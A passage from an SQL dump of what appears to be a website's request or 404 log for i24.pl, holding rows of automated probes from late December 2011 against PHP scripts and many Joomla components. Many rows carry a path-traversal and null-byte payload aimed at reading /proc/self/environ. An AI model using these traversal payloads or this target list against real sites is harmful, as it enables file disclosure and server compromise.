00:00:00'),(722,'http://www.i24.pl/stats/include/write.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:27','0000-00-00 00:00:00'),(723,'http://www.i24.pl/stats/tools/send_reminders.php?includ','','','',0,'2011-12-29 03:06:28','0000-00-00 00:00:00'),(724,'http://www.i24.pl/pollvote/pollvote.php?pollname../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:29','0000-00-00 00:00:00'),(725,'http://www.i24.pl/includes/page_header.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:30','0000-00-00 00:00:00'),(726,'http://www.i24.pl/new/bbs//include/write.php?dir=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:31','0000-00-00 00:00:00'),(727,'http://www.i24.pl/modules/My_eGallery/public/inc/?HCL_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:33','0000-00-00 00:00:00'),(728,'http://www.i24.pl/forum/auth/auth.php?phpbb_root_path=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:34','0000-00-00 00:00:00'),(729,'http://www.i24.pl/cutenews/comments.php?cutepath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:35','0000-00-00 00:00:00'),(730,'http://www.i24.pl/coppermine/thumbnails.php?lang=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:37','0000-00-00 00:00:00'),(731,'http://www.i24.pl/gallery/thumbnails.php?lang=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:38','0000-00-00 00:00:00'),(732,'http://www.i24.pl/aWebNews/visview.php?path_to_news=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:39','0000-00-00 00:00:00'),(733,'http://www.i24.pl/4images/index.php?template=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:40','0000-00-00 00:00:00'),(734,'http://www.i24.pl/galeri/index.php?template=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:41','0000-00-00 00:00:00'),(735,'http://www.i24.pl/components/com_extcalendar/admin_events.php?CONFIG_E','','','',0,'2011-12-29 03:06:42','0000-00-00 00:00:00'),(736,'http://www.i24.pl/components/com_videodb/core/videodb.class.xml.php?mos','','','',0,'2011-12-29 03:06:44','0000-00-00 00:00:00'),(737,'http://www.i24.pl/components/com_simpleboard/image_upload.php?sbp=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:45','0000-00-00 00:00:00'),(738,'http://www.i24.pl/gallery/index.php?template=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:45','0000-00-00 00:00:00'),(739,'http://www.i24.pl/modules/Forums/admin/index.php?phpbb_root_path','','','',0,'2011-12-29 03:06:47','0000-00-00 00:00:00'),(740,'http://www.i24.pl/modules/Forums/admin/admin_avatar.php?phpbb_ro','','','',0,'2011-12-29 03:06:48','0000-00-00 00:00:00'),(741,'http://www.i24.pl/_wk/wk_lang.php?wkPath=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:06:50','0000-00-00 00:00:00'),(742,'http://www.i24.pl/index.php?option=com_myblog&Itemid=12&task=','','','',0,'2011-12-29 03:07:09','0000-00-00 00:00:00'),(743,'http://www.i24.pl/index.php?option=com_juliaportfolio&controller=','','','',0,'2011-12-29 03:07:10','0000-00-00 00:00:00'),(744,'http://www.i24.pl/index.php?option=com_sbsfile&controller=','','','',0,'2011-12-29 03:07:11','0000-00-00 00:00:00'),(745,'http://www.i24.pl/index.php?option=com_rokdownloads&controller=','','','',0,'2011-12-29 03:07:12','0000-00-00 00:00:00'),(746,'http://www.i24.pl/index.php?option=com_sectionex&controller=','','','',0,'2011-12-29 03:07:12','0000-00-00 00:00:00'),(747,'http://www.i24.pl/index.php?option=com_ganalytics&controller=','','','',0,'2011-12-29 03:07:13','0000-00-00 00:00:00'),(748,'http://www.i24.pl/index.php?option=com_janews&controller=','','','',0,'2011-12-29 03:07:14','0000-00-00 00:00:00'),(749,'http://www.i24.pl/index.php?option=com_linkr&controller=','','','',0,'2011-12-29 03:07:14','0000-00-00 00:00:00'),(750,'http://www.i24.pl/index.php?option=com_rpx&controller=','','','',0,'2011-12-29 03:07:15','0000-00-00 00:00:00'),(751,'http://www.i24.pl/index.php?option=com_ninjarsssyndicator&controller=','','','',0,'2011-12-29 03:07:16','0000-00-00 00:00:00'),(752,'http://www.i24.pl/index.php?option=com_gcalendar&controller=','','','',0,'2011-12-29 03:07:16','0000-00-00 00:00:00'),(753,'http://www.i24.pl/index.php?option=com_ckforms&controller=','','','',0,'2011-12-29 03:07:17','0000-00-00 00:00:00'),(754,'http://www.i24.pl/index.php?option=com_jeformcr&view=','','','',0,'2011-12-29 03:07:18','0000-00-00 00:00:00'),(755,'http://www.i24.pl/index.php?option=com_jresearch&controller=','','','',0,'2011-12-29 03:07:18','0000-00-00 00:00:00'),(756,'http://www.i24.pl/index.php?option=com_smestorage&controller=','','','',0,'2011-12-29 03:07:19','0000-00-00 00:00:00'),(757,'http://www.i24.pl/index.php?option=com_properties&controller=','','','',0,'2011-12-29 03:07:20','0000-00-00 00:00:00'),(758,'http://www.i24.pl/index.php?option=com_dwgraphs&controller=','','','',0,'2011-12-29 03:07:21','0000-00-00 00:00:00'),(759,'http://www.i24.pl/index.php?option=com_weberpcustomer&controller=','','','',0,'2011-12-29 03:07:21','0000-00-00 00:00:00'),(760,'http://www.i24.pl/index.php?option=com_userstatus&controller=','','','',0,'2011-12-29 03:07:22','0000-00-00 00:00:00'),(761,'http://www.i24.pl/index.php?option=com_econtent&controller=','','','',0,'2011-12-29 03:07:23','0000-00-00 00:00:00'),(762,'http://www.i24.pl/index.php?option=com_jvehicles&controller=','','','',0,'2011-12-29 03:07:23','0000-00-00 00:00:00'),(763,'http://www.i24.pl/index.php?option=com_joomlapicasa2&controller=','','','',0,'2011-12-29 03:07:24','0000-00-00 00:00:00'),(764,'http://www.i24.pl/index.php?option=com_svmap&controller=','','','',0,'2011-12-29 03:07:25','0000-00-00 00:00:00'),(765,'http://www.i24.pl/index.php?option=com_shoutbox&controller=','','','',0,'2011-12-29 03:07:25','0000-00-00 00:00:00'),(766,'http://www.i24.pl/index.php?option=com_loginbox&view=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:07:26','0000-00-00 00:00:00'),(767,'http://www.i24.pl/index.php?option=com_myblog&Itemid=12&task=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:07:27','0000-00-00 00:00:00'),(768,'http://www.i24.pl/index.php?option=com_juliaportfolio&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:07:27','0000-00-00 00:00:00'),(769,'http://www.i24.pl/index.php?option=com_userstatus&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:07:39','0000-00-00 00:00:00'),(770,'http://www.i24.pl/index.php?option=com_loginbox&view=','','','',0,'2011-12-29 03:07:43','0000-00-00 00:00:00'),(771,'http://www.i24.pl/index.php?option=com_bca-rss-syndicator&controller=','','','',0,'2011-12-29 03:07:44','0000-00-00 00:00:00'),(772,'http://www.i24.pl/index.php?option=com_joomlaupdater&controller=','','','',0,'2011-12-29 03:07:45','0000-00-00 00:00:00'),(773,'http://www.i24.pl/index.php?option=com_redshop&view=','','','',0,'2011-12-29 03:07:45','0000-00-00 00:00:00'),(774,'http://www.i24.pl/index.php?option=com_redtwitter&view=','','','',0,'2011-12-29 03:07:46','0000-00-00 00:00:00'),(775,'http://www.i24.pl/index.php?option=com_wisroyq&controller=','','','',0,'2011-12-29 03:07:47','0000-00-00 00:00:00'),(776,'http://www.i24.pl/index.php?option=com_jinventory&controller=','','','',0,'2011-12-29 03:07:48','0000-00-00 00:00:00'),(777,'http://www.i24.pl/index.php?option=com_appointment&controller=','','','',0,'2011-12-29 03:07:48','0000-00-00 00:00:00'),(778,'http://www.i24.pl/index.php?option=com_datafeeds&controller=','','','',0,'2011-12-29 03:07:49','0000-00-00 00:00:00'),(779,'http://www.i24.pl/index.php?option=com_fabrik&controller=','','','',0,'2011-12-29 03:07:50','0000-00-00 00:00:00'),(780,'http://www.i24.pl/index.php?option=com_hsconfig&controller=','','','',0,'2011-12-29 03:07:50','0000-00-00 00:00:00'),(781,'http://www.i24.pl/index.php?option=com_joomlaflickr&controller=','','','',0,'2011-12-29 03:07:51','0000-00-00 00:00:00'),(782,'http://www.i24.pl/index.php?option=com_jukebox&controller=','','','',0,'2011-12-29 03:07:52','0000-00-00 00:00:00'),(783,'http://www.i24.pl/index.php?option=com_jwhmcs&controller=','','','',0,'2011-12-29 03:07:52','0000-00-00 00:00:00'),(784,'http://www.i24.pl/index.php?option=com_sebercart&view=','','','',0,'2011-12-29 03:07:53','0000-00-00 00:00:00'),(785,'http://www.i24.pl/index.php?option=com_awiki&controller=','','','',0,'2011-12-29 03:07:54','0000-00-00 00:00:00'),(786,'http://www.i24.pl/index.php?option=com_vjdeo&controller=','','','',0,'2011-12-29 03:07:54','0000-00-00 00:00:00'),(787,'http://www.i24.pl/index.php?option=com_awdwall&controller=','','','',0,'2011-12-29 03:07:55','0000-00-00 00:00:00'),(788,'http://www.i24.pl/index.php?option=com_realtyna&controller=','','','',0,'2011-12-29 03:07:56','0000-00-00 00:00:00'),(789,'http://www.i24.pl/index.php?option=com_webeecomment&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:07:57','0000-00-00 00:00:00'),(790,'http://www.i24.pl/index.php?option=com_javoice&view=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:07:57','0000-00-00 00:00:00'),(791,'http://www.i24.pl/index.php?option=com_foobla_suggestions&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:07:58','0000-00-00 00:00:00'),(792,'http://www.i24.pl/index.php?option=com_powermail&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:07:59','0000-00-00 00:00:00'),(793,'http://www.i24.pl/index.php?option=com_pcchess&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:07:59','0000-00-00 00:00:00'),(794,'http://www.i24.pl/index.php?option=com_spsnewsletter&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:00','0000-00-00 00:00:00'),(795,'http://www.i24.pl/index.php?option=com_alphauserpoints&view=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:01','0000-00-00 00:00:00'),(796,'http://www.i24.pl/index.php?option=com_travelbook&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:01','0000-00-00 00:00:00'),(797,'http://www.i24.pl/index.php?option=com_tweetla&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:02','0000-00-00 00:00:00'),(798,'http://www.i24.pl/index.php?option=com_ticketbook&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:03','0000-00-00 00:00:00'),(799,'http://www.i24.pl/index.php?option=com_jajobboard&view=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:03','0000-00-00 00:00:00'),(800,'http://www.i24.pl/index.php?option=com_jajobboard&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:04','0000-00-00 00:00:00'),(801,'http://www.i24.pl/index.php?option=com_jfeedback&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:05','0000-00-00 00:00:00'),(802,'http://www.i24.pl/index.php?option=com_jprojectmanager&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:06','0000-00-00 00:00:00'),(803,'http://www.i24.pl/index.php?option=com_preventive&controller=','','','',0,'2011-12-29 03:08:06','0000-00-00 00:00:00'),(804,'http://www.i24.pl/index.php?option=com_myfiles&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:07','0000-00-00 00:00:00'),(805,'http://www.i24.pl/index.php?option=com_onlineexam&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:08','0000-00-00 00:00:00'),(806,'http://www.i24.pl/index.php?option=com_joommail&controller=','','','',0,'2011-12-29 03:08:08','0000-00-00 00:00:00'),(807,'http://www.i24.pl/index.php?option=com_memory&controller=','','','',0,'2011-12-29 03:08:09','0000-00-00 00:00:00'),(808,'http://www.i24.pl/index.php?option=com_market&controller=','','','',0,'2011-12-29 03:08:10','0000-00-00 00:00:00'),(809,'http://www.i24.pl/index.php?option=com_diary&controller=','','','',0,'2011-12-29 03:08:10','0000-00-00 00:00:00'),(810,'http://www.i24.pl/index.php?option=com_webtv&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:11','0000-00-00 00:00:00'),(811,'http://www.i24.pl/index.php?option=com_horoscope&controller=','','','',0,'2011-12-29 03:08:12','0000-00-00 00:00:00'),(812,'http://www.i24.pl/index.php?option=com_arcadegames&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:12','0000-00-00 00:00:00'),(813,'http://www.i24.pl/index.php?option=com_flashgames&controller=','','','',0,'2011-12-29 03:08:13','0000-00-00 00:00:00'),(814,'http://www.i24.pl/index.php?option=com_addressbook&controller=','','','',0,'2011-12-29 03:08:14','0000-00-00 00:00:00'),(815,'http://www.i24.pl/index.php?option=com_flexicontent&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:08:15','0000-00-00 00:00:00'),(816,'http://www.i24.pl/index.php?option=com_advertising&controller=','','','',0,'2011-12-29 03:08:15','0000-00-00 00:00:00'),(817,'http://www.i24.pl/index.php?option=com_cvmaker&controller=','','','',0,'2011-12-29 03:08:16','0000-00-00 00:00:00'),(818,'http://www.i24.pl/index.php?option=com_worldrates&controller=','','','',0,'2011-12-29 03:08:17','0000-00-00 00:00:00'),(819,'http://www.i24.pl/index.php?option=com_record&controller=','','','',0,'2011-12-29 03:08:17','0000-00-00 00:00:00'),(820,'http://www.i24.pl/index.php?option=com_sweetykeeper&controller=','','','',0,'2011-12-29 03:08:18','0000-00-00 00:00:00'),(821,'http://www.i24.pl/index.php?option=com_beeheard&controller=','','','',0,'2011-12-29 03:08:19','0000-00-00 00:00:00'),(822,'http://www.i24.pl/index.php?option=com_blogfactory&controller=','','','',0,'2011-12-29 03:08:19','0000-00-00 00:00:00'),(823,'http://www.i24.pl/index.php?option=com_delicious&controller=','','','',0,'2011-12-29 03:08:20','0000-00-00 00:00:00'),(824,'http://www.i24.pl/index.php?option=com_jacomment&view=','','','',0,'2011-12-29 03:08:21','0000-00-00 00:00:00'),(825,'http://www.i24.pl/index.php?option=com_lovefactory&controller=','','','',0,'2011-12-29 03:08:22','0000-00-00 00:00:00'),(826,'http://www.i24.pl/index.php?option=com_mtfireeagle&controller=','','','',0,'2011-12-29 03:08:22','0000-00-00 00:00:00'),(827,'http://www.i24.pl/index.php?option=com_photobattle&view=','','','',0,'2011-12-29 03:08:23','0000-00-00 00:00:00'),(828,'http://www.i24.pl/index.php?option=com_s5clanroster&view=','','','',0,'2011-12-29 03:08:24','0000-00-00 00:00:00'),(829,'http://www.i24.pl/index.php?option=com_s5clanroster&controller=','','','',0,'2011-12-29 03:08:24','0000-00-00 00:00:00'),(830,'http://www.i24.pl/index.php?option=com_wgpicasa&controller=','','','',0,'2011-12-29 03:08:25','0000-00-00 00:00:00'),(831,'http://www.i24.pl/index.php?option=com_zimbcomment&controller=','','','',0,'2011-12-29 03:08:26','0000-00-00 00:00:00'),(832,'http://www.i24.pl/index.php?option=com_zimbcore&controller=','','','',0,'2011-12-29 03:08:26','0000-00-00 00:00:00'),(833,'http://www.i24.pl/index.php?option=com_gadgetfactory&controller=','','','',0,'2011-12-29 03:08:27','0000-00-00 00:00:00'),(834,'http://www.i24.pl/index.php?option=com_matamko&controller=','','','',0,'2011-12-29 03:08:28','0000-00-00 00:00:00'),(835,'http://www.i24.pl/index.php?option=com_archeryscores&controller=','','','',0,'2011-12-29 03:08:28','0000-00-00 00:00:00'),(836,'http://www.i24.pl/index.php?option=com_multiroot&controller=','','','',0,'2011-12-29 03:08:29','0000-00-00 00:00:00'),(837,'http://www.i24.pl/index.php?option=com_multimap&controller=','','','',0,'2011-12-29 03:08:30','0000-00-00 00:00:00'),(838,'http://www.i24.pl/index.php?option=com_drawroot&controller=','','','',0,'2011-12-29 03:08:31','0000-00-00 00:00:00'),(839,'http://www.i24.pl/index.php?option=com_google&controller=','','','',0,'2011-12-29 03:08:31','0000-00-00 00:00:00'),(840,'http://www.i24.pl/index.php?option=com_if_surfalert&controller=','','','',0,'2011-12-29 03:08:32','0000-00-00 00:00:00'),(841,'http://www.i24.pl/index.php?option=com_orgchart&controller=','','','',0,'2011-12-29 03:08:33','0000-00-00 00:00:00'),(842,'http://www.i24.pl/index.php?option=com_mmsblog&controller=','','','',0,'2011-12-29 03:08:33','0000-00-00 00:00:00'),(843,'http://www.i24.pl/index.php?option=com_wmi&controller=','','','',0,'2011-12-29 03:08:34','0000-00-00 00:00:00'),(844,'http://www.i24.pl/index.php?option=com_ultimateportfolio&controller=','','','',0,'2011-12-29 03:08:35','0000-00-00 00:00:00'),(845,'http://www.i24.pl/index.php?option=com_noticeboard&controller=','','','',0,'2011-12-29 03:08:35','0000-00-00 00:00:00'),(846,'http://www.i24.pl/index.php?option=com_smartsite&controller=','','','',0,'2011-12-29 03:08:36','0000-00-00 00:00:00'),(847,'http://www.i24.pl/index.php?option=com_graphics&controller=','','','',0,'2011-12-29 03:08:37','0000-00-00 00:00:00'),(848,'http://www.i24.pl/index.php?option=com_php&file=','','','',0,'2011-12-29 03:08:37','0000-00-00 00:00:00'),(849,'http://www.i24.pl/index.php?option=com_aardvertiser&task=','','','',0,'2011-12-29 03:08:38','0000-00-00 00:00:00'),(850,'http://www.i24.pl/index.php?option=com_jejob&view=','','','',0,'2011-12-29 03:08:39','0000-00-00 00:00:00'),(851,'http://www.i24.pl/index.php?option=com_jeajaxeventcalendar&view=','','','',0,'2011-12-29 03:08:40','0000-00-00 00:00:00'),(852,'http://www.i24.pl/index.php?option=com_dioneformwizard&controller=','','','',0,'2011-12-29 03:08:40','0000-00-00 00:00:00'),(853,'http://www.i24.pl/index.php?option=com_jequoteform&view=','','','',0,'2011-12-29 03:08:41','0000-00-00 00:00:00'),(854,'http://www.i24.pl/index.php?option=com_mscomment&controller=','','','',0,'2011-12-29 03:08:42','0000-00-00 00:00:00'),(855,'http://www.i24.pl/index.php?option=com_simpledownload&controller=','','','',0,'2011-12-29 03:08:42','0000-00-00 00:00:00'),(856,'http://www.i24.pl/index.php?option=com_event&view=','','','',0,'2011-12-29 03:08:43','0000-00-00 00:00:00'),(857,'http://www.i24.pl/index.php?option=com_product&controller=','','','',0,'2011-12-29 03:08:44','0000-00-00 00:00:00'),(858,'http://www.i24.pl/index.php?option=com_job&controller=','','','',0,'2011-12-29 03:08:44','0000-00-00 00:00:00'),(859,'http://www.i24.pl/index2.php?option=com_simpledownload&controller=','','','',0,'2011-12-29 03:08:45','0000-00-00 00:00:00'),(860,'http://www.i24.pl/index.php?option=com_perchaimageattach&controller=','','','',0,'2011-12-29 03:08:46','0000-00-00 00:00:00'),(861,'http://www.i24.pl/index.php?option=com_perchafieldsattach&controller=','','','',0,'2011-12-29 03:08:46','0000-00-00 00:00:00'),(862,'http://www.i24.pl/index.php?option=com_perchagallery&controller=','','','',0,'2011-12-29 03:08:47','0000-00-00 00:00:00'),(863,'http://www.i24.pl/joomla/index.php?option=com_myblog&Itemid=12&task=','','','',0,'2011-12-29 03:08:48','0000-00-00 00:00:00'),(864,'http://www.i24.pl/joomla/index.php?option=com_juliaportfolio&controller=','','','',0,'2011-12-29 03:08:49','0000-00-00 00:00:00'),(865,'http://www.i24.pl/joomla/index.php?option=com_sbsfile&controller=','','','',0,'2011-12-29 03:08:49','0000-00-00 00:00:00'),(866,'http://www.i24.pl/joomla/index.php?option=com_rokdownloads&controller=','','','',0,'2011-12-29 03:08:50','0000-00-00 00:00:00'),(867,'http://www.i24.pl/joomla/index.php?option=com_sectionex&controller=','','','',0,'2011-12-29 03:08:51','0000-00-00 00:00:00'),(868,'http://www.i24.pl/joomla/index.php?option=com_ganalytics&controller=','','','',0,'2011-12-29 03:08:51','0000-00-00 00:00:00'),(869,'http://www.i24.pl/joomla/index.php?option=com_janews&controller=','','','',0,'2011-12-29 03:08:52','0000-00-00 00:00:00'),(870,'http://www.i24.pl/joomla/index.php?option=com_linkr&controller=','','','',0,'2011-12-29 03:08:53','0000-00-00 00:00:00'),(871,'http://www.i24.pl/joomla/index.php?option=com_rpx&controller=','','','',0,'2011-12-29 03:08:53','0000-00-00 00:00:00'),(872,'http://www.i24.pl/joomla/index.php?option=com_ninjarsssyndicator&controller=','','','',0,'2011-12-29 03:08:54','0000-00-00 00:00:00'),(873,'http://www.i24.pl/joomla/index.php?option=com_gcalendar&controller=','','','',0,'2011-12-29 03:08:55','0000-00-00 00:00:00'),(874,'http://www.i24.pl/joomla/index.php?option=com_ckforms&controller=','','','',0,'2011-12-29 03:08:55','0000-00-00 00:00:00'),(875,'http://www.i24.pl/joomla/index.php?option=com_jeformcr&view=','','','',0,'2011-12-29 03:08:56','0000-00-00 00:00:00'),(876,'http://www.i24.pl/joomla/index.php?option=com_jresearch&controller=','','','',0,'2011-12-29 03:08:57','0000-00-00 00:00:00'),(877,'http://www.i24.pl/joomla/index.php?option=com_smestorage&controller=','','','',0,'2011-12-29 03:08:58','0000-00-00 00:00:00'),(878,'http://www.i24.pl/joomla/index.php?option=com_properties&controller=','','','',0,'2011-12-29 03:08:58','0000-00-00 00:00:00'),(879,'http://www.i24.pl/joomla/index.php?option=com_dwgraphs&controller=','','','',0,'2011-12-29 03:08:59','0000-00-00 00:00:00'),(880,'http://www.i24.pl/joomla/index.php?option=com_weberpcustomer&controller=','','','',0,'2011-12-29 03:09:00','0000-00-00 00:00:00'),(881,'http://www.i24.pl/joomla/index.php?option=com_userstatus&controller=','','','',0,'2011-12-29 03:09:00','0000-00-00 00:00:00'),(882,'http://www.i24.pl/joomla/index.php?option=com_econtent&controller=','','','',0,'2011-12-29 03:09:01','0000-00-00 00:00:00'),(883,'http://www.i24.pl/joomla/index.php?option=com_jvehicles&controller=','','','',0,'2011-12-29 03:09:02','0000-00-00 00:00:00'),(884,'http://www.i24.pl/joomla/index.php?option=com_joomlapicasa2&controller=','','','',0,'2011-12-29 03:09:02','0000-00-00 00:00:00'),(885,'http://www.i24.pl/joomla/index.php?option=com_svmap&controller=','','','',0,'2011-12-29 03:09:03','0000-00-00 00:00:00'),(886,'http://www.i24.pl/joomla/index.php?option=com_shoutbox&controller=','','','',0,'2011-12-29 03:09:04','0000-00-00 00:00:00'),(887,'http://www.i24.pl/joomla/index.php?option=com_loginbox&view=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:04','0000-00-00 00:00:00'),(888,'http://www.i24.pl/joomla/index.php?option=com_myblog&Itemid=12&task=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:05','0000-00-00 00:00:00'),(889,'http://www.i24.pl/joomla/index.php?option=com_juliaportfolio&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:06','0000-00-00 00:00:00'),(890,'http://www.i24.pl/joomla/index.php?option=com_userstatus&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:18','0000-00-00 00:00:00'),(891,'http://www.i24.pl/joomla/index.php?option=com_loginbox&view=','','','',0,'2011-12-29 03:09:22','0000-00-00 00:00:00'),(892,'http://www.i24.pl/joomla/index.php?option=com_bca-rss-syndicator&controller=','','','',0,'2011-12-29 03:09:22','0000-00-00 00:00:00'),(893,'http://www.i24.pl/joomla/index.php?option=com_joomlaupdater&controller=','','','',0,'2011-12-29 03:09:23','0000-00-00 00:00:00'),(894,'http://www.i24.pl/joomla/index.php?option=com_redshop&view=','','','',0,'2011-12-29 03:09:24','0000-00-00 00:00:00'),(895,'http://www.i24.pl/joomla/index.php?option=com_redtwitter&view=','','','',0,'2011-12-29 03:09:25','0000-00-00 00:00:00'),(896,'http://www.i24.pl/joomla/index.php?option=com_wisroyq&controller=','','','',0,'2011-12-29 03:09:25','0000-00-00 00:00:00'),(897,'http://www.i24.pl/joomla/index.php?option=com_jinventory&controller=','','','',0,'2011-12-29 03:09:26','0000-00-00 00:00:00'),(898,'http://www.i24.pl/joomla/index.php?option=com_appointment&controller=','','','',0,'2011-12-29 03:09:27','0000-00-00 00:00:00'),(899,'http://www.i24.pl/joomla/index.php?option=com_datafeeds&controller=','','','',0,'2011-12-29 03:09:27','0000-00-00 00:00:00'),(900,'http://www.i24.pl/joomla/index.php?option=com_fabrik&controller=','','','',0,'2011-12-29 03:09:28','0000-00-00 00:00:00'),(901,'http://www.i24.pl/joomla/index.php?option=com_hsconfig&controller=','','','',0,'2011-12-29 03:09:29','0000-00-00 00:00:00'),(902,'http://www.i24.pl/joomla/index.php?option=com_joomlaflickr&controller=','','','',0,'2011-12-29 03:09:29','0000-00-00 00:00:00'),(903,'http://www.i24.pl/joomla/index.php?option=com_jukebox&controller=','','','',0,'2011-12-29 03:09:30','0000-00-00 00:00:00'),(904,'http://www.i24.pl/joomla/index.php?option=com_jwhmcs&controller=','','','',0,'2011-12-29 03:09:31','0000-00-00 00:00:00'),(905,'http://www.i24.pl/joomla/index.php?option=com_sebercart&view=','','','',0,'2011-12-29 03:09:32','0000-00-00 00:00:00'),(906,'http://www.i24.pl/joomla/index.php?option=com_awiki&controller=','','','',0,'2011-12-29 03:09:32','0000-00-00 00:00:00'),(907,'http://www.i24.pl/joomla/index.php?option=com_vjdeo&controller=','','','',0,'2011-12-29 03:09:33','0000-00-00 00:00:00'),(908,'http://www.i24.pl/joomla/index.php?option=com_awdwall&controller=','','','',0,'2011-12-29 03:09:34','0000-00-00 00:00:00'),(909,'http://www.i24.pl/joomla/index.php?option=com_realtyna&controller=','','','',0,'2011-12-29 03:09:34','0000-00-00 00:00:00'),(910,'http://www.i24.pl/joomla/index.php?option=com_webeecomment&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:35','0000-00-00 00:00:00'),(911,'http://www.i24.pl/joomla/index.php?option=com_javoice&view=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:36','0000-00-00 00:00:00'),(912,'http://www.i24.pl/joomla/index.php?option=com_foobla_suggestions&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:36','0000-00-00 00:00:00'),(913,'http://www.i24.pl/joomla/index.php?option=com_powermail&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:37','0000-00-00 00:00:00'),(914,'http://www.i24.pl/joomla/index.php?option=com_pcchess&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:38','0000-00-00 00:00:00'),(915,'http://www.i24.pl/joomla/index.php?option=com_spsnewsletter&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:38','0000-00-00 00:00:00'),(916,'http://www.i24.pl/joomla/index.php?option=com_alphauserpoints&view=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:39','0000-00-00 00:00:00'),(917,'http://www.i24.pl/joomla/index.php?option=com_travelbook&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:40','0000-00-00 00:00:00'),(918,'http://www.i24.pl/joomla/index.php?option=com_tweetla&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:41','0000-00-00 00:00:00'),(919,'http://www.i24.pl/joomla/index.php?option=com_ticketbook&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:41','0000-00-00 00:00:00'),(920,'http://www.i24.pl/joomla/index.php?option=com_jajobboard&view=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:42','0000-00-00 00:00:00'),(921,'http://www.i24.pl/joomla/index.php?option=com_jajobboard&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:43','0000-00-00 00:00:00'),(922,'http://www.i24.pl/joomla/index.php?option=com_jfeedback&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:43','0000-00-00 00:00:00'),(923,'http://www.i24.pl/joomla/index.php?option=com_jprojectmanager&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:44','0000-00-00 00:00:00'),(924,'http://www.i24.pl/joomla/index.php?option=com_preventive&controller=','','','',0,'2011-12-29 03:09:45','0000-00-00 00:00:00'),(925,'http://www.i24.pl/joomla/index.php?option=com_myfiles&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:45','0000-00-00 00:00:00'),(926,'http://www.i24.pl/joomla/index.php?option=com_onlineexam&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:46','0000-00-00 00:00:00'),(927,'http://www.i24.pl/joomla/index.php?option=com_joommail&controller=','','','',0,'2011-12-29 03:09:47','0000-00-00 00:00:00'),(928,'http://www.i24.pl/joomla/index.php?option=com_memory&controller=','','','',0,'2011-12-29 03:09:47','0000-00-00 00:00:00'),(929,'http://www.i24.pl/joomla/index.php?option=com_market&controller=','','','',0,'2011-12-29 03:09:48','0000-00-00 00:00:00'),(930,'http://www.i24.pl/joomla/index.php?option=com_diary&controller=','','','',0,'2011-12-29 03:09:49','0000-00-00 00:00:00'),(931,'http://www.i24.pl/joomla/index.php?option=com_webtv&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:50','0000-00-00 00:00:00'),(932,'http://www.i24.pl/joomla/index.php?option=com_horoscope&controller=','','','',0,'2011-12-29 03:09:50','0000-00-00 00:00:00'),(933,'http://www.i24.pl/joomla/index.php?option=com_arcadegames&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:51','0000-00-00 00:00:00'),(934,'http://www.i24.pl/joomla/index.php?option=com_flashgames&controller=','','','',0,'2011-12-29 